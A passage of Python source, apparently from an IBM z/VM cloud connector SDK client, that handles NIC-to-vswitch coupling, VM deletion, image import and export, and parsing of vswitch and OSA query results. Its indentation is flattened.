elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
raise error
def _couple_nic(self, userid, vdev, vswitch_name,
active=False):
"""Couple NIC to vswitch by adding vswitch into user direct."""
if active:
self._is_active(userid)
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Connect_Vswitch',
"--operands",
"-v %s" % vdev,
"-n %s" % vswitch_name))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
results1 = err1.results
msg1 = err1.format_message()
if ((results1 is not None) and
(results1['rc'] == 204) and
(results1['rs'] == 20)):
LOG.warning("Virtual device %s already connected "
"on the active guest system", vdev)
else:
persist_OK = True
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect_DM',
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results2 = err2.results
msg2 = err2.format_message()
if ((results2 is not None) and
(results2['rc'] == 212) and
(results2['rs'] == 32)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._couple_active_exception(err1, userid, vdev,
vswitch_name)
else:
raise exception.SDKNetworkOperationError(rs=3,
nic=vdev, vswitch=vswitch_name,
couple_err=msg1, revoke_err=msg2)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
vswitch_name)
msg = ('Couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s successfully'
% {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name})
LOG.info(msg)
def couple_nic_to_vswitch(self, userid, nic_vdev,
vswitch_name, active=False, vlan_id=-1):
"""Couple nic to vswitch."""
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Connect nic %s to switch %s %s",
nic_vdev, vswitch_name, msg)
        # Previously we used Virtual_Network_Adapter_Connect_Vswitch_DM,
        # but due to a limitation in SMAPI there is no way to add a VLAN ID,
        # so we have to build the user direct entry ourselves.
msg = ('Start to couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s with vlan %(vlan_id)s:'
% {'vdev': nic_vdev, 'vm': userid, 'vsw': vswitch_name,
'vlan_id': vlan_id})
LOG.info(msg)
user_direct = self.get_user_direct(userid)
new_user_direct = []
nicdef = "NICDEF %s" % nic_vdev
for ent in user_direct:
if len(ent) > 0:
new_user_direct.append(ent)
if ent.upper().startswith(nicdef):
# vlan_id < 0 means no VLAN ID given
v = nicdef
if vlan_id < 0:
v += " LAN SYSTEM %s" % vswitch_name
else:
v += " LAN SYSTEM %s VLAN %s" % (vswitch_name, vlan_id)
new_user_direct.append(v)
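        # Illustrative example (hypothetical values): for nic_vdev '1000',
        # vswitch 'VSW1' and vlan_id 100, the new entry
        #   "NICDEF 1000 LAN SYSTEM VSW1 VLAN 100"
        # is appended right after the existing "NICDEF 1000 ..." statement.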
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=9, userid=userid,
err=e.format_message())
# Replace user directory
try:
self._replace_user_direct(userid, new_user_direct)
except exception.SDKSMTRequestFailed as e:
rd = ("SMAPI %s API Image_Unlock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
# ignore 'not locked' error
if ((err2.results['rc'] == 400) and (
err2.results['rs'] == 24)):
LOG.debug("Guest '%s' unlocked successfully." % userid)
pass
else:
                    # Just log the error and ignore this unlock failure
msg = ("Unlock definition of guest '%s' failed "
"with SMT error: %s" %
(userid, err2.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=10,
userid=userid,
err=e.format_message())
self._couple_nic(userid, nic_vdev, vswitch_name, active=active)
def _uncouple_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=12,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _uncouple_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=13,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def _uncouple_nic(self, userid, vdev, active=False):
"""Uncouple NIC from vswitch"""
if active:
self._is_active(userid)
msg = ('Start to uncouple nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s' % userid,
"API Virtual_Network_Adapter_Disconnect_DM",
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 212) and
(results['rs'] == 32)):
LOG.warning("Virtual device %s is already disconnected "
"in the guest's user direct", vdev)
else:
LOG.error("Failed to uncouple nic %s in the guest's user "
"direct, error: %s" % (vdev, emsg))
self._uncouple_inactive_exception(err, userid, vdev)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
None)
        # The instance must be active, or this call will fail
if active:
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect',
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 204) and
(results['rs'] == 48)):
LOG.warning("Virtual device %s is already "
"disconnected on the active "
"guest system", vdev)
else:
LOG.error("Failed to uncouple nic %s on the active "
"guest system, error: %s" % (vdev, emsg))
self._uncouple_active_exception(err, userid, vdev)
msg = ('Uncouple nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def uncouple_nic_from_vswitch(self, userid, nic_vdev,
active=False):
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Disconnect nic %s with network %s",
nic_vdev, msg)
self._uncouple_nic(userid, nic_vdev, active=active)
def delete_userid(self, userid):
rd = ' '.join(('deletevm', userid, 'directory'))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if err.results['rc'] == 400 and err.results['rs'] == 4:
# guest vm definition not found
LOG.debug("The guest %s does not exist." % userid)
return
            # Ignore the "delete VM not finished" error
if err.results['rc'] == 596 and err.results['rs'] == 6831:
# 596/6831 means delete VM not finished yet
LOG.warning("The guest %s deleted with 596/6831" % userid)
return
# ignore delete VM with VDISK format error
# DirMaint does not support formatting TDISK or VDISK extents.
if err.results['rc'] == 596 and err.results['rs'] == 3543:
LOG.debug("The guest %s deleted with 596/3543" % userid)
return
# The CP or CMS command shown resulted in a non-zero
# return code. This message is frequently preceded by
# a DMK, HCP, or DMS error message that describes the cause
# https://www-01.ibm.com/servers/resourcelink/svc0302a.nsf/
# pages/zVMV7R2gc246282/$file/hcpk2_v7r2.pdf
if err.results['rc'] == 596 and err.results['rs'] == 2119:
LOG.debug("The guest %s deleted with 596/2119" % userid)
return
msg = "SMT error: %s" % err.format_message()
raise exception.SDKSMTRequestFailed(err.results, msg)
def delete_vm(self, userid):
self.delete_userid(userid)
# remove userid from smapi namelist
self.namelist_remove(zvmutils.get_namelist(), userid)
# revoke userid from vswitch
action = "revoke id %s authority from vswitch" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
switch_info = self._NetDbOperator.switch_select_record_for_userid(
userid)
switch_list = set()
for item in switch_info:
switch_list.add(item['switch'])
for item in switch_list:
if item is not None:
self.revoke_user_from_vswitch(item, userid)
# cleanup db record from network table
action = "delete network record for user %s" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._NetDbOperator.switch_delete_record_for_userid(userid)
# TODO: cleanup db record from volume table
pass
# cleanup persistent folder for guest
self._pathutils.remove_guest_path(userid)
# cleanup db record from guest table
action = "delete guest %s from database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.delete_guest_by_userid(userid)
def execute_cmd(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
with zvmutils.log_and_reraise_smt_request_failed(action='execute '
'command on vm via iucv channel'):
results = self._request(requestData)
ret = results['response']
return ret
def execute_cmd_direct(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
results = self._smt.request(requestData)
return results
def image_import(self, image_name, url, image_meta, remote_host=None):
"""Import the image specified in url to SDK image repository, and
create a record in image db, the imported images are located in
image_repository/prov_method/os_version/image_name/, for example,
/opt/sdk/images/netboot/rhel7.2/90685d2b-167bimage/0100"""
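        # Flow: verify the image name is unused, create the repository
        # folder, fetch the file via the URL scheme backend, verify its
        # md5sum against image_meta, then record the metadata in the image db.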
image_info = []
try:
image_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image record %s doens't exist in SDK image datebase,"
" will import the image and create record now" % image_name)
LOG.info(msg)
        # Ensure the specified image does not already exist in the image DB
if image_info:
msg = ("The image name %s has already exist in SDK image "
"database, please check if they are same image or consider"
" to use a different image name for import" % image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=13, img=image_name)
try:
image_os_version = image_meta['os_version'].lower()
target_folder = self._pathutils.create_import_image_repository(
image_os_version, const.IMAGE_TYPE['DEPLOY'],
image_name)
except Exception as err:
msg = ('Failed to create repository to store image %(img)s with '
                   'error: %(err)s, please make sure there is enough space '
'on zvmsdk server and proper permission to create the '
'repository' % {'img': image_name,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
if self.is_rhcos(image_os_version):
image_disk_type = image_meta.get('disk_type')
if ((image_disk_type is None) or
((image_disk_type.upper() != "DASD" and
image_disk_type.upper() != "SCSI"))):
msg = ('Disk type is required for RHCOS image import, '
'the value should be DASD or SCSI')
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
else:
comments = {'disk_type': image_disk_type.upper()}
comments = str(comments)
else:
comments = None
try:
import_image_fn = urlparse.urlparse(url).path.split('/')[-1]
import_image_fpath = '/'.join([target_folder, import_image_fn])
self._scheme2backend(urlparse.urlparse(url).scheme).image_import(
image_name, url,
import_image_fpath,
remote_host=remote_host)
# Check md5 after import to ensure import a correct image
# TODO change to use query image name in DB
expect_md5sum = image_meta.get('md5sum')
real_md5sum = self._get_md5sum(import_image_fpath)
if expect_md5sum and expect_md5sum != real_md5sum:
msg = ("The md5sum after import is not same as source image,"
" the image has been broken")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=4)
            # After import to the image repository, figure out whether the
            # image is a single-disk or a multiple-disk image; if it has
            # multiple disks, extract it, and if it is a single-disk image,
            # rename the file to match the root vdev
# TODO: (nafei) use sub-function to check the image type
image_type = 'rootonly'
if image_type == 'rootonly':
final_image_fpath = '/'.join([target_folder,
CONF.zvm.user_root_vdev])
os.rename(import_image_fpath, final_image_fpath)
elif image_type == 'alldisks':
# For multiple disks image, extract it, after extract, the
# content under image folder is like: 0100, 0101, 0102
# and remove the image file 0100-0101-0102.tgz
pass
# TODO: put multiple disk image into consideration, update the
# disk_size_units and image_size db field
if not self.is_rhcos(image_os_version):
disk_size_units = self._get_disk_size_units(final_image_fpath)
else:
disk_size_units = self._get_disk_size_units_rhcos(
final_image_fpath)
image_size = self._get_image_size(final_image_fpath)
# TODO: update the real_md5sum field to include each disk image
self._ImageDbOperator.image_add_record(image_name,
image_os_version,
real_md5sum,
disk_size_units,
image_size,
image_type,
comments=comments)
LOG.info("Image %s is import successfully" % image_name)
except Exception:
# Cleanup the image from image repository
self._pathutils.clean_temp_folder(target_folder)
raise
def image_export(self, image_name, dest_url, remote_host=None):
"""Export the specific image to remote host or local file system
        :param image_name: image name that can uniquely identify an image
        :param dest_url: the location to store the exported image, eg.
                         /opt/images, the image will be stored in folder
                         /opt/images/
        :param remote_host: the server to export the image to, in the format
                            username@IP eg. [email protected]; if remote_host is
                            None, the image will be stored on the local server
        :returns: a dictionary that contains the exported image info
{
'image_name': the image_name that exported
'image_path': the image_path after exported
'os_version': the os version of the exported image
'md5sum': the md5sum of the original image
'comments': the comments of the original image
}
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
image_type = image_info[0]['type']
# TODO: (nafei) according to image_type, detect image exported path
# For multiple disk image, make the tgz firstly, the specify the
# source_path to be something like: 0100-0101-0102.tgz
if image_type == 'rootonly':
source_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
image_info[0]['imageosdistro'],
image_name,
CONF.zvm.user_root_vdev])
else:
pass
self._scheme2backend(urlparse.urlparse(dest_url).scheme).image_export(
source_path, dest_url,
remote_host=remote_host)
# TODO: (nafei) for multiple disks image, update the expect_dict
# to be the tgz's md5sum
export_dict = {'image_name': image_name,
'image_path': dest_url,
'os_version': image_info[0]['imageosdistro'],
'md5sum': image_info[0]['md5sum'],
'comments': image_info[0]['comments']}
LOG.info("Image %s export successfully" % image_name)
return export_dict
def _get_image_disk_size_units(self, image_path):
""" Return a comma separated string to indicate the image disk size
and units for each image disk file under image_path
        For a single disk image, it looks like: 0100=3338:CYL
For multiple disk image, it looks like:
0100=3338:CYL,0101=4194200:BLK, 0102=4370:CYL"""
pass
def _get_disk_size_units(self, image_path):
command = 'hexdump -n 48 -C %s' % image_path
(rc, output) = zvmutils.execute(command)
LOG.debug("hexdump result is %s" % output)
if rc:
msg = ("Error happened when executing command hexdump with"
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=5)
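        # Note: the slice offsets below index into hexdump's formatted text
        # output, not into the image file itself; images captured by the SDK
        # embed the root disk size and units in this 48-byte header area.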
try:
root_disk_size = int(output[144:156])
disk_units = output[220:223]
root_disk_units = ':'.join([str(root_disk_size), disk_units])
except ValueError:
msg = ("Image file at %s is missing built-in disk size "
"metadata, it was probably not captured by SDK" %
image_path)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=6)
if 'FBA' not in output and 'CKD' not in output:
raise exception.SDKImageOperationError(rs=7)
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
def _get_disk_size_units_rhcos(self, image_path):
command = "fdisk -b 4096 -l %s | head -2 | awk '{print $5}'" % (
image_path)
rc = 0
output = ""
try:
# shell should be set True because it is a shell command with
# pipeline, so can not use utils.execute function here
output = subprocess.check_output(command, shell=True,
stderr=subprocess.STDOUT)
output = bytes.decode(output)
except subprocess.CalledProcessError as err:
rc = err.returncode
output = err.output
except Exception as err:
            err_msg = ('Command "%s" Error: %s' % (command, str(err)))
raise exception.SDKInternalError(msg=err_msg)
if rc or output.strip('1234567890*\n'):
msg = ("Error happened when executing command fdisk with "
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
image_size = output.split()[0]
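        # Convert the byte size reported by fdisk into cylinders.
        # 737280 = 180 blocks * 4096 bytes, presumably the capacity of one
        # 3390 DASD cylinder formatted with 4KB blocks.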
try:
cyl = (float(image_size)) / 737280
cyl = str(int(math.ceil(cyl)))
except Exception:
msg = ("Failed to convert %s to a number of cylinders."
% image_size)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
disk_units = "CYL"
root_disk_units = ':'.join([str(cyl), disk_units])
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
def _get_image_size(self, image_path):
"""Return disk size in bytes"""
command = 'du -b %s' % image_path
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when executing command du -b with"
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
size = output.split()[0]
return size
def _get_image_path_by_name(self, image_name):
try:
target_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
# TODO: (nafei) Handle multiple disks image deploy
image_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
target_info[0]['imageosdistro'],
image_name])
return image_path
def _scheme2backend(self, scheme):
try:
return {
"file": FilesystemBackend,
"http": HTTPBackend,
# "https": HTTPSBackend
}[scheme]
except KeyError:
msg = ("No backend found for '%s'" % scheme)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=2, schema=scheme)
def _get_md5sum(self, fpath):
"""Calculate the md5sum of the specific image file"""
try:
current_md5 = hashlib.md5()
if isinstance(fpath, six.string_types) and os.path.exists(fpath):
with open(fpath, "rb") as fh:
for chunk in self._read_chunks(fh):
current_md5.update(chunk)
elif (fpath.__class__.__name__ in ["StringIO", "StringO"] or
isinstance(fpath, IOBase)):
for chunk in self._read_chunks(fpath):
current_md5.update(chunk)
else:
return ""
return current_md5.hexdigest()
except Exception:
msg = ("Failed to calculate the image's md5sum")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=3)
def _read_chunks(self, fh):
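        # Generator yielding the file content in CHUNKSIZE pieces; the
        # while-else rewinds the file handle once the whole file is read.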
fh.seek(0)
chunk = fh.read(CHUNKSIZE)
while chunk:
yield chunk
chunk = fh.read(CHUNKSIZE)
else:
fh.seek(0)
def image_delete(self, image_name):
# Delete image file
try:
self._delete_image_file(image_name)
# Delete image record from db
self._ImageDbOperator.image_delete_record(image_name)
except exception.SDKImageOperationError as err:
results = err.results
if ((results['rc'] == 300) and (results['rs'] == 20)):
LOG.warning("Image %s does not exist", image_name)
return
else:
LOG.error("Failed to delete image %s, error: %s" %
(image_name, err.format_message()))
raise
msg = ('Delete image %s successfully' % image_name)
LOG.info(msg)
def _delete_image_file(self, image_name):
image_path = self._get_image_path_by_name(image_name)
self._pathutils.clean_temp_folder(image_path)
def _get_image_last_access_time(self, image_name, raise_exception=True):
"""Get the last access time of the image."""
image_file = os.path.join(self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev)
if not os.path.exists(image_file):
if raise_exception:
msg = 'Failed to get time stamp of image:%s' % image_name
LOG.error(msg)
raise exception.SDKImageOperationError(rs=23, img=image_name)
else:
# An invalid timestamp
return -1
atime = os.path.getatime(image_file)
return atime
def image_query(self, image_name=None):
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
            # the database query may return None, so return an empty list here
return []
# if image_name is not None, means there is only one record
if image_name:
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
image_info[0]['last_access_time'] = last_access_time
else:
for item in image_info:
image_name = item['imagename']
                # set raise_exception to False so that one failure does not
                # stop processing the remaining items in the list
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
item['last_access_time'] = last_access_time
return image_info
def image_get_root_disk_size(self, image_name):
"""Return the root disk units of the specified image
image_name: the unique image name in db
Return the disk units in format like 3339:CYL or 467200:BLK
"""
image_info = self.image_query(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
disk_size_units = image_info[0]['disk_size_units'].split(':')[0]
return disk_size_units
def image_get_os_distro(self, image_name):
"""
Return the operating system distro of the specified image
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
os_distro = image_info[0]['imageosdistro']
return os_distro
def _get_image_disk_type(self, image_name):
"""
Return image disk type
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
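        # The comments column stores a stringified dict (see image_import),
        # so eval() is used here to recover the disk_type value.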
if ((image_info[0]['comments'] is not None) and
(image_info[0]['comments'].__contains__('disk_type'))):
image_disk_type = eval(image_info[0]['comments'])['disk_type']
if image_disk_type == 'DASD':
return 'ECKD'
elif image_disk_type == 'SCSI':
return 'SCSI'
else:
return None
else:
return None
def punch_file(self, userid, fn, fclass):
rd = ("changevm %(uid)s punchfile %(file)s --class %(class)s" %
{'uid': userid, 'file': fn, 'class': fclass})
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to punch file to userid '%s',"
"error: %s" % (userid, err.format_message()))
raise
finally:
os.remove(fn)
def get_guest_connection_status(self, userid):
'''Get guest vm connection status.'''
rd = ' '.join(('getvm', userid, 'isreachable'))
results = self._request(rd)
if results['rs'] == 1:
return True
else:
return False
def _generate_disk_parmline(self, vdev, fmt, mntdir):
parms = [
'action=' + 'addMdisk',
'vaddr=' + vdev,
'filesys=' + fmt,
'mntdir=' + mntdir
]
parmline = ' '.join(parms)
parmstr = "'" + parmline + "'"
return parmstr
def process_additional_minidisks(self, userid, disk_info):
'''Generate and punch the scripts used to process additional disk into
target vm's reader.
'''
for idx, disk in enumerate(disk_info):
vdev = disk.get('vdev') or self.generate_disk_vdev(
offset = (idx + 1))
fmt = disk.get('format')
mount_dir = disk.get('mntdir') or ''.join(['/mnt/ephemeral',
str(vdev)])
# the mount point of swap partition is swap
if fmt == "swap":
mount_dir = "swap"
disk_parms = self._generate_disk_parmline(vdev, fmt, mount_dir)
func_name = '/var/lib/zvmsdk/setupDisk'
self.aemod_handler(userid, func_name, disk_parms)
# trigger do-script
if self.get_power_state(userid) == 'on':
self.execute_cmd(userid, "/usr/bin/zvmguestconfigure start")
def aemod_handler(self, instance_name, func_name, parms):
rd = ' '.join(['changevm', instance_name, 'aemod', func_name,
'--invparms', parms])
action = parms[0] + instance_name
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_user_console_output(self, userid):
# get console into reader
rd = 'getvm %s consoleoutput' % userid
action = 'get console log reader file list for guest vm: %s' % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
resp = self._request(rd)
with zvmutils.expect_invalid_resp_data(resp):
rf_list = resp['response'][0].rpartition(':')[2].strip().split()
# TODO: make sure reader device is online
# via 'cat /sys/bus/ccw/drivers/vmur/0.0.000c/online'
# 'sudo /sbin/cio_ignore -r 000c; sudo /sbin/chccwdev -e 000c'
# 'which udevadm &> /dev/null && udevadm settle || udevsettle'
logs = []
for rf in rf_list:
cmd = 'sudo /usr/sbin/vmur re -t -O %s' % rf
rc, output = zvmutils.execute(cmd)
if rc == 0:
logs.append(output)
return ''.join(logs)
def query_vswitch(self, switch_name):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % switch_name
))
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
msg = 'Vswitch %s does not exist' % switch_name
LOG.error(msg)
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
action = "query vswitch details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
vsw_info = {}
with zvmutils.expect_invalid_resp_data():
# ignore user_vlan_id part and jump to the vswitch basic info
idx_end = len(rd_list)
idx = 0
while((idx < idx_end) and
not rd_list[idx].__contains__('switch_name')):
idx = idx + 1
# The next 21 lines contains the vswitch basic info
# eg, name, type, port_type, vlan_awareness, etc
for i in range(21):
rd = rd_list[idx + i].split(':')
vsw_info[rd[0].strip()] = rd[1].strip()
idx = idx + 21
# Skip the vepa_status
while((idx < idx_end) and
not rd_list[idx].__contains__('real_device_address') and
not rd_list[idx].__contains__('port_num') and
not rd_list[idx].__contains__('adapter_owner')):
idx = idx + 1
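            # The helper closures below each parse one 'keyword: value' line
            # and advance the running index into the response list.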
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
if value == '(NONE)':
value = 'NONE'
return idx + offset, value
def _parse_dev_status(value):
if value in const.DEV_STATUS.keys():
return const.DEV_STATUS[value]
else:
return 'Unknown'
def _parse_dev_err(value):
if value in const.DEV_ERROR.keys():
return const.DEV_ERROR[value]
else:
return 'Unknown'
# Start to analyse the real devices info
vsw_info['real_devices'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('real_device_address')):
# each rdev has 6 lines' info
idx, rdev_addr = _parse_value(rd_list, idx,
'real_device_address: ')
idx, vdev_addr = _parse_value(rd_list, idx,
'virtual_device_address: ')
idx, controller = _parse_value(rd_list, idx,
'controller_name: ')
idx, port_name = _parse_value(rd_list, idx, 'port_name: ')
idx, dev_status = _parse_value(rd_list, idx,
'device_status: ')
idx, dev_err = _parse_value(rd_list, idx,
'device_error_status ')
vsw_info['real_devices'][rdev_addr] = {'vdev': vdev_addr,
'controller': controller,
'port_name': port_name,
'dev_status':
_parse_dev_status(
dev_status),
'dev_err': _parse_dev_err(
dev_err)
}
# Under some case there would be an error line in the output
# "Error controller_name is NULL!!", skip this line
if ((idx < idx_end) and
rd_list[idx].__contains__(
'Error controller_name is NULL!!')):
idx += 1
# Start to get the authorized userids
vsw_info['authorized_users'] = {}
while((idx < idx_end) and rd_list[idx].__contains__('port_num')):
# each authorized userid has 6 lines' info at least
idx, port_num = _parse_value(rd_list, idx,
'port_num: ')
idx, userid = _parse_value(rd_list, idx,
'grant_userid: ')
idx, prom_mode = _parse_value(rd_list, idx,
'promiscuous_mode: ')
idx, osd_sim = _parse_value(rd_list, idx, 'osd_sim: ')
idx, vlan_count = _parse_value(rd_list, idx,
'vlan_count: ')
vlan_ids = []
for i in range(int(vlan_count)):
idx, id = _parse_value(rd_list, idx,
'user_vlan_id: ')
vlan_ids.append(id)
# For vlan unaware vswitch, the query smcli would
# return vlan_count as 1, here we just set the count to 0
if (vsw_info['vlan_awareness'] == 'UNAWARE'):
vlan_count = 0
vlan_ids = []
vsw_info['authorized_users'][userid] = {
'port_num': port_num,
'prom_mode': prom_mode,
'osd_sim': osd_sim,
'vlan_count': vlan_count,
'vlan_ids': vlan_ids
}
# Start to get the connected adapters info
# OWNER_VDEV would be used as the dict key for each adapter
vsw_info['adapters'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('adapter_owner')):
# each adapter has four line info: owner, vdev, macaddr, type
idx, owner = _parse_value(rd_list, idx,
'adapter_owner: ')
idx, vdev = _parse_value(rd_list, idx,
'adapter_vdev: ')
idx, mac = _parse_value(rd_list, idx,
'adapter_macaddr: ')
idx, type = _parse_value(rd_list, idx, 'adapter_type: ')
key = owner + '_' + vdev
vsw_info['adapters'][key] = {
'mac': mac,
'type': type
}
# Todo: analyze and add the uplink NIC info and global member info
def _parse_switch_status(value):
if value in const.SWITCH_STATUS.keys():
return const.SWITCH_STATUS[value]
else:
return 'Unknown'
if 'switch_status' in vsw_info.keys():
vsw_info['switch_status'] = _parse_switch_status(
vsw_info['switch_status'])
return vsw_info
def get_nic_info(self, userid=None, nic_id=None, vswitch=None):
nic_info = self._NetDbOperator.switch_select_record(userid=userid,
nic_id=nic_id, vswitch=vswitch)
return nic_info
def is_first_network_config(self, userid):
action = "get guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
info = self._GuestDbOperator.get_guest_by_userid(userid)
# check net_set
if int(info[3]) == 0:
return True
else:
return False
def update_guestdb_with_net_set(self, userid):
action = "update guest '%s' in database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.update_guest_by_userid(userid, net_set='1')
def _is_OSA_free(self, OSA_device):
osa_info = self._query_OSA()
if 'OSA' not in osa_info.keys():
return False
elif len(osa_info['OSA']['FREE']) == 0:
return False
else:
dev1 = str(OSA_device).zfill(4).upper()
dev2 = str(str(hex(int(OSA_device, 16) + 1))[2:]).zfill(4).upper()
dev3 = str(str(hex(int(OSA_device, 16) + 2))[2:]).zfill(4).upper()
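            # A dedicated OSA uses three consecutive device addresses
            # (presumably the read/write/data triplet), so all three
            # must be free.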
if ((dev1 in osa_info['OSA']['FREE']) and
(dev2 in osa_info['OSA']['FREE']) and
(dev3 in osa_info['OSA']['FREE'])):
return True
else:
return False
def _query_OSA(self):
smt_userid = zvmutils.get_smt_userid()
rd = "SMAPI %s API Virtual_Network_OSA_Query" % smt_userid
OSA_info = {}
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 4) and (err.results['rs'] == 4)):
msg = 'No OSAs on system'
LOG.info(msg)
return OSA_info
else:
action = "query OSA details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
